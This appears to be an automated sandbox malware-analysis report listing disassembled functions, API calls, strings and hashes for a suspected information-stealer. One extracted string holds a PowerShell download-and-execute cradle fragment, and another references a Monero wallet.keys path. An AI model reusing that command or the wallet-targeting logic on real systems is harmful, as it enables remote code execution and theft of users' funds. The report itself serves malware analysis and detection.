Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: c418c491b281641586fed287784b349a63fe2ee70b7dfe1dea5b3d57aefd0a3b
Instruction ID: c4c91a9559a0f6b8f68e0d410487a6368f543847ff02eb1baea553f9bb7ae2cf
Opcode Fuzzy Hash: c418c491b281641586fed287784b349a63fe2ee70b7dfe1dea5b3d57aefd0a3b
Instruction Fuzzy Hash: 9041D271C101089AEB14FBA1C891BDDBB74AF10304F50496FE116B6191DFBC6A5ACFA9

Function 6C6474A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C647526
__Init_thread_footer.LIBCMT ref: 6C647566
__Init_thread_footer.LIBCMT ref: 6C647597

Strings

UnmapViewOfFile2, xrefs: 6C647552
kernel32.dll, xrefs: 6C647557

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 64a5296c3780c88e45f322d692970c1055a66189bad16d08d09187d05e85a48d
Instruction ID: 5cd554b2fbb36449a19a3f45c6fe16e2a8fe577a6538a98fe3b16ebbd7585f12
Opcode Fuzzy Hash: 64a5296c3780c88e45f322d692970c1055a66189bad16d08d09187d05e85a48d
Instruction Fuzzy Hash: FF21D6317045419BCB18CFAB9894FA97775EB87325F00C529D40587F40CB22A805C99F

Function 6C64C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C64C0E9), ref: 6C64C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C64C437
FreeLibrary.KERNEL32(?,6C64C0E9), ref: 6C64C44C

Strings

NtQueryVirtualMemory, xrefs: 6C64C431
ntdll.dll, xrefs: 6C64C413

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: c8fb6cd9663c3a702e5dfe1498fd7057f86db305ab58b474402d753a682a7dbe
Instruction ID: 80c078023dcb7a2d3ada9983f159b741fd2d73b339a0f0e932908436cfe045f0
Opcode Fuzzy Hash: c8fb6cd9663c3a702e5dfe1498fd7057f86db305ab58b474402d753a682a7dbe
Instruction Fuzzy Hash: FBE09270701301EBDB006B738A987397AF8BB86344F00915AAA0591710EBB1E4069A5F

Function 00479E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00479F41

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Strings

@, xrefs: 00479EF1
v10, xrefs: 00479EA3
ERROR_RUN_EXTRACTOR, xrefs: 00479E67
v20, xrefs: 00479E21

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: 18dc4ab3d88a806f743984453acccee094233a89d8754ea7a9567dddeb81ce78
Instruction ID: 6c3e8f3df84a1a876bde7f14585e1aba85a190e5601eb19cb8303ed41722e5ed
Opcode Fuzzy Hash: 18dc4ab3d88a806f743984453acccee094233a89d8754ea7a9567dddeb81ce78
Instruction Fuzzy Hash: 81615270900248AFDB14FFA5CC95FED7775AF44304F00841AF90A5B191EBBC6A15CB56

Function 6C5F1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C5F152B,?,?,?,?,6C5F1248,?), ref: 6C5F159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C5F152B,?,?,?,?,6C5F1248,?), ref: 6C5F15BC
moz_xmalloc.MOZGLUE(-00000001,?,6C5F152B,?,?,?,?,6C5F1248,?), ref: 6C5F15E7
free.MOZGLUE(?,?,?,?,?,?,6C5F152B,?,?,?,?,6C5F1248,?), ref: 6C5F1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C5F152B,?,?,?,?,6C5F1248,?), ref: 6C5F1637

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 33a54240ba8b6bce87233f593cff57d451629ef43690685f2b39905d7ac56c45
Instruction ID: 7b1aae033bb823c45b10350c76243dcc9f2718a425dfce560c219df33dc762b8
Opcode Fuzzy Hash: 33a54240ba8b6bce87233f593cff57d451629ef43690685f2b39905d7ac56c45
Instruction Fuzzy Hash: 0131B3B2A001148BCB1D8E68DC9046F77A9EB853647240B2DE433DBBD4EB30E9168F95

Function 6C64AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C65E330,?,6C60C059), ref: 6C64AD9D

Part of subcall function 6C5FCA10: malloc.MOZGLUE(?), ref: 6C5FCA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C65E330,?,6C60C059), ref: 6C64ADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C65E330,?,6C60C059), ref: 6C64AE01
GetLastError.KERNEL32(?,00000000,?,?,6C65E330,?,6C60C059), ref: 6C64AE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C65E330,?,6C60C059), ref: 6C64AE3D

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 220e053802d025013e7eac3bad632d1aa9fc8d6f4e0895e58d908d645cc1185f
Instruction ID: 3868324a224396e2bd33e23abcad4ab188c55c9bd2085b23f9262d38cd21006b
Opcode Fuzzy Hash: 220e053802d025013e7eac3bad632d1aa9fc8d6f4e0895e58d908d645cc1185f
Instruction Fuzzy Hash: 883184B1A00215AFDB10DF7A8C44AABB7F8EF49614F54843DE95AD7700E734E805CBA8

Function 6C5EB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C5EB532
moz_xmalloc.MOZGLUE(?), ref: 6C5EB55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5EB56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C5EB57E
free.MOZGLUE(00000000), ref: 6C5EB58F

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 6a5cff5d108f20fda498179b818e549f6562370bc7eb0f2df9322807e09689ef
Instruction ID: 9a04f4c217e9e122e620162842da57ee85ab4d22e79ee99b950163705172bdd4
Opcode Fuzzy Hash: 6a5cff5d108f20fda498179b818e549f6562370bc7eb0f2df9322807e09689ef
Instruction Fuzzy Hash: 9421D871A002059BDB00DF65CC80B7ABBB9FF86315F244129E915DB342F776D911C7A5

Function 00489260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0110E0B0,?,?,?,0048140C,?,0110E0B0,00000000), ref: 0048926C
lstrcpyn.KERNEL32(006BAB88,0110E0B0,0110E0B0,?,0048140C,?,0110E0B0), ref: 00489290
lstrlen.KERNEL32(?,?,0048140C,?,0110E0B0), ref: 004892A7
wsprintfA.USER32 ref: 004892C7

Strings

%s%s, xrefs: 004892B5

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: db2ddbc0f3803dd0773b863ff21b2de78811a149bfefa31aa2d4c947beae9745
Instruction ID: ade12047d49ec16142079e79ff349ce2d526d60f3c08eab9abea82262e99e2bd
Opcode Fuzzy Hash: db2ddbc0f3803dd0773b863ff21b2de78811a149bfefa31aa2d4c947beae9745
Instruction Fuzzy Hash: 68011EB5500108FFCB04DFECC998EAE7BBAEB44350F148648F9099B300C635AE80DB95

Function 6C620D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C5E3DEF), ref: 6C620D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C5E3DEF), ref: 6C620D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C5E3DEF), ref: 6C620DAF

Strings

<jemalloc>, xrefs: 6C620D92, 6C620DB9
: (malloc) Error in VirtualFree(), xrefs: 6C620D97, 6C620DBE

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 1627d31770da0ea873f54fc41f2fa17e7424cdc2dda0c5cf2a900d8ba5694f31
Instruction ID: dbffd30a1355b9385672f3311f4ea4657b3e98b7c9856dc3fb033c8f3ccb5223
Opcode Fuzzy Hash: 1627d31770da0ea873f54fc41f2fa17e7424cdc2dda0c5cf2a900d8ba5694f31
Instruction Fuzzy Hash: 23F0E9313D129863E72415770C2AB6A27AD6BC2B65F304435F604DEDC0DAA8E8018EAF

Function 6C60D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C61CBE8: GetCurrentProcess.KERNEL32(?,6C5E31A7), ref: 6C61CBF1
Part of subcall function 6C61CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5E31A7), ref: 6C61CBFA

EnterCriticalSection.KERNEL32(6C66E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C61D1C5), ref: 6C60D4F2
LeaveCriticalSection.KERNEL32(6C66E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C61D1C5), ref: 6C60D50B

Part of subcall function 6C5ECFE0: EnterCriticalSection.KERNEL32(6C66E784), ref: 6C5ECFF6
Part of subcall function 6C5ECFE0: LeaveCriticalSection.KERNEL32(6C66E784), ref: 6C5ED026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C61D1C5), ref: 6C60D52E
EnterCriticalSection.KERNEL32(6C66E7DC), ref: 6C60D690
LeaveCriticalSection.KERNEL32(6C66E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C61D1C5), ref: 6C60D751

Strings

MOZ_CRASH(), xrefs: 6C60D4BB

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 446268c2bc290a4023c73fc15a62ae6f4208e2957ba347c82cf8622f4287e7ca
Instruction ID: 96227a53d8bbac38d39b85b5d5b52d2ef05ac852d20f96e8ff78c4fc195aba7a
Opcode Fuzzy Hash: 446268c2bc290a4023c73fc15a62ae6f4208e2957ba347c82cf8622f4287e7ca
Instruction Fuzzy Hash: 2451B271B047019FD358CF2AC59476AB7E1EB8A704F144A2ED59AD7F44D770A800CB5A

Function 6C63B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5E4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C623EBD,6C623EBD,00000000), ref: 6C5E42A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C63B127), ref: 6C63B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C63B4E4

Strings

pid:, xrefs: 6C63B4DE

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 845bf7908a696b0f99c11a8d09c81f02c4d5a84e188fcc56a3b57b837ce68cae
Instruction ID: a0a010a0be3da05d758a43a163eefc09a36a0fcc2cada7a802ecfd109f45be3a
Opcode Fuzzy Hash: 845bf7908a696b0f99c11a8d09c81f02c4d5a84e188fcc56a3b57b837ce68cae
Instruction Fuzzy Hash: D7313931A01628DBCB00DFAAD880AEEB7B5FF85318F542529D44567A42D731E845CBED

Function 00486630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00486663

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

ShellExecuteEx.SHELL32(0000003C), ref: 00486726
ExitProcess.KERNEL32 ref: 00486755

Strings

<, xrefs: 004866D9

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: bce197add49273dd42ffbcd4df3ab1733c5e36b25c943b11706168b06ba53206
Instruction ID: aebbd7c8278ad27288c4f635b91afe39de2c6b899d8e3c59d9e29790f3a40fa2
Opcode Fuzzy Hash: bce197add49273dd42ffbcd4df3ab1733c5e36b25c943b11706168b06ba53206
Instruction Fuzzy Hash: FA314DF1801218AADB14FB91DC91BDD7778AF04304F80559EF20566191DFB86B89CF6A

Function 004887C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00490E28,00000000,?), ref: 0048882F
RtlAllocateHeap.NTDLL(00000000), ref: 00488836
wsprintfA.USER32 ref: 00488850

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Strings

%dx%d, xrefs: 00488847

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
